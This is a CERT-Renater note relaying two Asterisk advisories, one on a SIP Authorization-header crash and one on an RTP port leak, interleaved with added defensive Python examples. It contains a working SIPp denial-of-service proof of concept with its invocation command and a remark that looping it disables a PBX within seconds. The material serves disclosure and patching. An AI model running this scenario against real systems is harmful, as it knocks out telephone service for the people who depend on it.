
=====================================================================

                            CERT-Renater

                Information Note No. 2025/VULN559
_____________________________________________________________________

DATE                : 29/08/2025

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running Asterisk versions prior to
                           22.5.2, 21.10.2, 20.15.2.

=====================================================================
https://github.com/asterisk/asterisk/security/advisories/GHSA-64qc-9x89-rx5j
https://github.com/asterisk/asterisk/security/advisories/GHSA-557q-795j-wfx2
_____________________________________________________________________

A specifically malformed Authorization header in an incoming SIP
request can cause Asterisk to crash

High
gtjoseph published GHSA-64qc-9x89-rx5j Aug 28, 2025

Package
asterisk (Asterisk)

Affected versions
<= 22.5.1
<= 21.10.1
<= 20.15.1

Patched versions
22.5.2
21.10.2
20.15.2


Description

Impact

If a SIP request is received with an Authorization header that
contains a realm that wasn't in a previous 401 response's
WWW-Authenticate header, or an Authorization header with an
incorrect realm is received without a previous 401 response having
been sent, the get_authorization_header() function in
res_pjsip_authenticator_digest returns NULL. This return value wasn't
being checked before attempting to read the digest algorithm from
the header, so the NULL pointer is dereferenced and causes a SEGV.
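Added example (Python, not Asterisk's C code): a simplified model of the lookup described above with the missing check in place. Only the name get_authorization_header() comes from the advisory; the Digest parser, the set of realms "we" challenged with, and the sample headers are constructed assumptions.

```python
import re
from typing import Optional

# Matches one parameter of a Digest credential: key="quoted" or key=token.
_PARAM_RE = re.compile(r'(\w+)=(?:"([^"]*)"|([^,\s]+))')

def parse_digest(value: str) -> Optional[dict]:
    """Return the parameters of a 'Digest ...' credential, or None if the
    scheme is not Digest (values are parsed here, never verified)."""
    scheme, _, params = value.strip().partition(" ")
    if scheme.lower() != "digest":
        return None
    return {m.group(1).lower(): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM_RE.finditer(params)}

def get_authorization_header(headers, challenged_realms):
    """Return the first Digest Authorization header whose realm is one we
    challenged with in an earlier 401 (WWW-Authenticate), else None.
    With no earlier 401 the set is empty, so nothing matches: these are
    exactly the two situations in which the advisory says NULL comes back."""
    for name, value in headers:
        if name.lower() != "authorization":
            continue
        params = parse_digest(value)
        if params is not None and params.get("realm") in challenged_realms:
            return params
    return None

def digest_algorithm(headers, challenged_realms):
    """Hardened caller: test the lookup result before touching it. Returns
    the algorithm name, or None meaning 'reject or re-challenge' instead of
    dereferencing a header that is not there."""
    auth = get_authorization_header(headers, challenged_realms)
    if auth is None:  # the check that was missing in affected versions
        return None
    return auth.get("algorithm", "MD5")  # MD5 is the Digest default when absent

# Constructed sample: an INVITE carrying credentials for realm "asterisk".
SAMPLE_HEADERS = [
    ("Via", "SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds"),
    ("Authorization", 'Digest username="1001", realm="asterisk", '
                      'nonce="1693180800/abc", uri="sip:pbx.example", '
                      'response="0123456789abcdef", algorithm=SHA-256'),
]

if __name__ == "__main__":
    print(digest_algorithm(SAMPLE_HEADERS, {"asterisk"}))     # SHA-256
    print(digest_algorithm(SAMPLE_HEADERS, {"other-realm"}))  # None: realm mismatch
    print(digest_algorithm(SAMPLE_HEADERS, set()))            # None: no prior 401
```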


Workarounds

There are no workarounds.


Severity
High
7.5 / 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-57767

Weaknesses
CWE-253


Credits

    pc-m (@pc-m), Finder

_____________________________________________________________________


Resource exhaustion (DoS) vulnerability: remotely exploitable leak
of RTP UDP ports and internal resources

Moderate
gtjoseph published GHSA-557q-795j-wfx2 Aug 28, 2025


Package
asterisk (Asterisk)

Affected versions
<= 18.26.3
<= 18.9-cert16

Patched versions
18.26.4
18.9-cert17


Description

Summary

I am not sure what happens there, but the simulation posted below
causes Asterisk 18.26.3 and earlier 18.x (not yet tested on 20.x)
to leak RTP UDP ports and internal resources. First encountered
in the wild, then cleanly reproduced.


Details

Environment: FreePBX 16, Asterisk 18.26.3 (also works on older
Asterisk versions), PJSIP.

Transports: works on all: UDP, TCP, TLS.

Specifics:

Anonymous endpoint in PJSIP:

[anonymous]
type=endpoint
context=from-sip-external
allow=alaw,ulaw,gsm

Target context (from-sip-external):

[from-sip-external]
exten => _.,1,NoOp(Received incoming SIP connection from unknown peer to ${EXTEN})
exten => _.,n,Set(DID=${IF($["${EXTEN:1:2}"=""]?s:${EXTEN})})
exten => _.,n,Goto(s,1)
exten => s,1,GotoIf($["${SIPLANG}"!=""]?setlanguage:checkanon)
exten => s,n(setlanguage),Set(CHANNEL(language)=${SIPLANG})
exten => s,n(checkanon),GotoIf($["${ALLOW_SIP_ANON}"!="yes"]?noanonymous)
exten => s,n,Goto(from-trunk,${DID},1)
exten => s,n(noanonymous),Set(TIMEOUT(absolute)=15)
exten => s,n,Set(receveip=${IF($["${CUT(CHANNEL,/,1)}" != "PJSIP"]?recvip:pjsip,remote_addr)})
exten => s,n,Log(WARNING,"Rejecting unknown SIP connection from ${CHANNEL(${receveip})}")
exten => s,n,Answer
exten => s,n,Wait(2)
exten => s,n,Playback(ss-noservice)
exten => s,n,Playtones(congestion)
exten => s,n,Congestion(5)
exten => h,1,Hangup
exten => i,1,Hangup
exten => t,1,Hangup

What's important: the call is not considered terminating and
continues through the dialplan until hangup even if the TCP/TLS
connection breaks.

Can be reduced just to:

[from-sip-external]
exten => _.,1,NoOp(Received incoming SIP connection from unknown peer to ${EXTEN})
exten => _.,n,Answer
exten => _.,n,Hangup

This still allows the issue to be reproduced.


PoC

SIPP-based issue reproducing script (test.xml):

Invocation: sipp -sf test.xml -t u1 -s 1001 -key callto "88880000441613940229" -recv_timeout 3000 -send_timeout 3000 -rtp_echo -m 1 [target Asterisk PBX IP]

The culprit seems to be branch=012345678. Changing this to a proper
branch ID ([branch] in SIPP terms) eliminates the issue: BYE
requests are received during the session and the resources are freed.


<?xml version="1.0" encoding="ISO-8859-1" ?>
<!DOCTYPE scenario SYSTEM "sipp.dtd">

<scenario name="asterisk_leak_test">
  <send retrans="1000">
    <![CDATA[
      INVITE sip:[callto]@[remote_ip] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];branch=012345678
      From:  <sip:[service]@[remote_ip]>;tag=72618e6f
      To:  <sip:[callto]@[remote_ip]>
      Contact: <sip:[service]@[local_ip]:[local_port];transport=[transport]>;expires=60
      Call-ID: [call_id]
      CSeq: [cseq] INVITE
      Max-Forwards: 70
      User-Agent: cisco
      Allow: INVITE, REGISTER, ACK, CANCEL, BYE, NOTIFY, REFER, OPTIONS, INFO, SUBSCRIBE, UPDATE, PRACK, MESSAGE
      Content-Length: 0
    ]]>
  </send>

  <recv response="100" optional="true">
  </recv>
  <recv response="180" optional="true">
  </recv>
  <recv response="183" optional="true">
  </recv>
  <recv response="200" next="do_ack">
  </recv>

  <label id="do_ack" />

  <send>
    <![CDATA[
      ACK sip:[remote_ip]:[remote_port];transport=[transport] SIP/2.0
      Via: SIP/2.0/[transport] [local_ip]:[local_port];rport=[local_port];received=[local_ip];branch=012345678
      From:  <sip:[service]@[local_ip]>;tag=72618e6f
      To:  <sip:[callto]@[remote_ip]>[peer_tag_param]
      Call-ID: [call_id]
      CSeq: [cseq] ACK
      Max-Forwards: 70
      Content-Length: 0
    ]]>
  </send>

  <pause milliseconds="3000">
  </pause>
</scenario>

Expected outcome: BYE received during the session, due to the
session-rejecting context terminating the call.

Actual outcome: nothing received after ACK, Asterisk leaks resources.

It can be repeated as often as necessary in a tight loop (even
removing the pause, which exists just to catch the BYE) to quickly
exhaust the RTP port range. Obviously, removing the pause and looping
this towards the target makes it inoperable in seconds.
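Added example, not part of the reporter's PoC: a small validator a SIP front-end or log parser can run on inbound requests to flag the condition the reporter points at, a Via branch without the RFC 3261 magic cookie (z9hG4bK, a requirement from the RFC, not from the advisory). The sample INVITE and its branch value are constructed after the scenario above.

```python
import re

MAGIC_COOKIE = "z9hG4bK"  # RFC 3261 s.8.1.1.7: compliant branch IDs start with it

def parse_headers(raw: str):
    """Split a raw SIP message into (lower-cased name, value) pairs; body ignored."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    pairs = []
    for line in head.split("\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep:
            pairs.append((name.strip().lower(), value.strip()))
    return pairs

def via_branch(via_value: str):
    """Return the branch parameter of one Via header value, or None."""
    for param in via_value.split(";")[1:]:
        key, _, val = param.strip().partition("=")
        if key.lower() == "branch":
            return val
    return None

def check_via(raw: str):
    """Return a list of findings; an empty list means the top Via looks compliant."""
    vias = [v for n, v in parse_headers(raw) if n in ("via", "v")]
    if not vias:
        return ["no Via header"]
    branch = via_branch(vias[0])
    if branch is None:
        return ["top Via has no branch parameter"]
    if not branch.startswith(MAGIC_COOKIE):
        return [f"top Via branch {branch!r} lacks the {MAGIC_COOKIE} magic cookie"]
    return []

# Constructed request modelled on the scenario above (same branch value).
PROBLEM_INVITE = (
    "INVITE sip:1001@pbx.example SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=012345678\r\n"
    "From: <sip:1001@pbx.example>;tag=72618e6f\r\n"
    "To: <sip:1001@pbx.example>\r\n"
    "Call-ID: constructed-call-id@192.0.2.10\r\n"
    "CSeq: 1 INVITE\r\n"
    "Content-Length: 0\r\n\r\n"
)
GOOD_INVITE = PROBLEM_INVITE.replace("branch=012345678", "branch=z9hG4bK7a1c9e")

if __name__ == "__main__":
    print(check_via(PROBLEM_INVITE))  # one finding about the branch
    print(check_via(GOOD_INVITE))     # []
```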


Impact

Resource exhaustion. UDP RTP ports are not closed, and the module
show command shows leaking module usage counters (they grow with
each call).

Sample:

Module                         Description                              Use Count  Status      Support Level
chan_pjsip.so                  PJSIP Channel Driver                     625        Running              core
res_pjsip.so                   Basic SIP resource                       153        Running              core
res_pjsip_aoc.so               PJSIP AOC Support                        208        Running          extended
res_pjsip_caller_id.so         PJSIP Caller ID Support                  105        Running              core
res_pjsip_diversion.so         PJSIP Add Diversion Header Support       105        Running              core
res_pjsip_dlg_options.so       SIP OPTIONS in dialog handler            104        Running              core
res_pjsip_dtmf_info.so         PJSIP DTMF INFO Support                  104        Running              core
res_pjsip_empty_info.so        PJSIP Empty INFO Support                 104        Running              core
res_pjsip_geolocation.so       res_pjsip_geolocation Module for Asteris 104        Running              core
res_pjsip_header_funcs.so      PJSIP Header Functions                   104        Running              core
res_pjsip_messaging.so         PJSIP Messaging Support                  104        Running              core
res_pjsip_nat.so               PJSIP NAT Support                        104        Running              core
res_pjsip_one_touch_record_info.so PJSIP INFO One Touch Recording Support   104        Running              core
res_pjsip_path.so              PJSIP Path Header Support                104        Running              core
res_pjsip_refer.so             PJSIP Blind and Attended Transfer Suppor 105        Running              core
res_pjsip_rfc3326.so           PJSIP RFC3326 Support                    104        Running              core
res_pjsip_rfc3329.so           PJSIP RFC3329 Support (partial)          104        Running              core
res_pjsip_sdp_rtp.so           PJSIP SDP RTP/AVP stream handler         104        Running              core
res_pjsip_send_to_voicemail.so PJSIP REFER Send to Voicemail Support    104        Running              core
res_pjsip_session.so           PJSIP Session resource                   124        Running              core
res_pjsip_t38.so               PJSIP T.38 UDPTL Support                 104        Running              core
res_pjsip_transport_websocket.so PJSIP WebSocket Transport Support        104        Running              core
res_rtp_asterisk.so            Asterisk RTP Stack                       108        Running              core

(all of these grow on each exploiting call)
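Added example, not from the reporter or the Asterisk project: a monitoring check that parses two "module show" snapshots taken while the PBX is idle and reports counters that only ever climb, the leak signature described above. The rows are adapted from the sample output, the second snapshot and the app_dial row are constructed for the demo.

```python
import re

# One row of "module show": name, free-text description, use count, status, support level.
_ROW_RE = re.compile(r"^(\S+)\s+.*?\s+(\d+)\s+(Running|Not Running)\s+(\S+)\s*$")

def parse_module_show(output: str) -> dict:
    """Map module name -> use count; header, footer and blank lines are skipped."""
    counts = {}
    for line in output.splitlines():
        m = _ROW_RE.match(line)
        if m:
            counts[m.group(1)] = int(m.group(2))
    return counts

def growing_modules(before: dict, after: dict, min_delta: int = 1) -> dict:
    """Return {module: increase} for counters that rose by at least min_delta.
    Taken between two idle periods (no calls up), any rise is suspicious:
    a healthy PBX returns to the same baseline once its calls hang up."""
    return {name: after[name] - before.get(name, 0)
            for name in after
            if after[name] - before.get(name, 0) >= min_delta}

# Constructed snapshots: rows adapted from the sample above, then the same rows
# after a further batch of calls (the increased counts are made up).
BEFORE = """\
Module                         Description                              Use Count  Status      Support Level
chan_pjsip.so                  PJSIP Channel Driver                     625        Running              core
res_pjsip_session.so           PJSIP Session resource                   124        Running              core
res_rtp_asterisk.so            Asterisk RTP Stack                       108        Running              core
app_dial.so                    Dialing Application                      0          Running              core
4 modules loaded
"""
AFTER = BEFORE.replace("625 ", "645 ").replace("124 ", "144 ").replace("108 ", "128 ")

if __name__ == "__main__":
    deltas = growing_modules(parse_module_show(BEFORE), parse_module_show(AFTER))
    for name, delta in deltas.items():
        print(f"{name}: use count +{delta} between idle snapshots")
```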


Severity
Moderate
6.5 / 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CVE ID
CVE-2025-54995

Weaknesses
CWE-1286

Credits

    AlexAT (@AlexAT), Reporter


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================
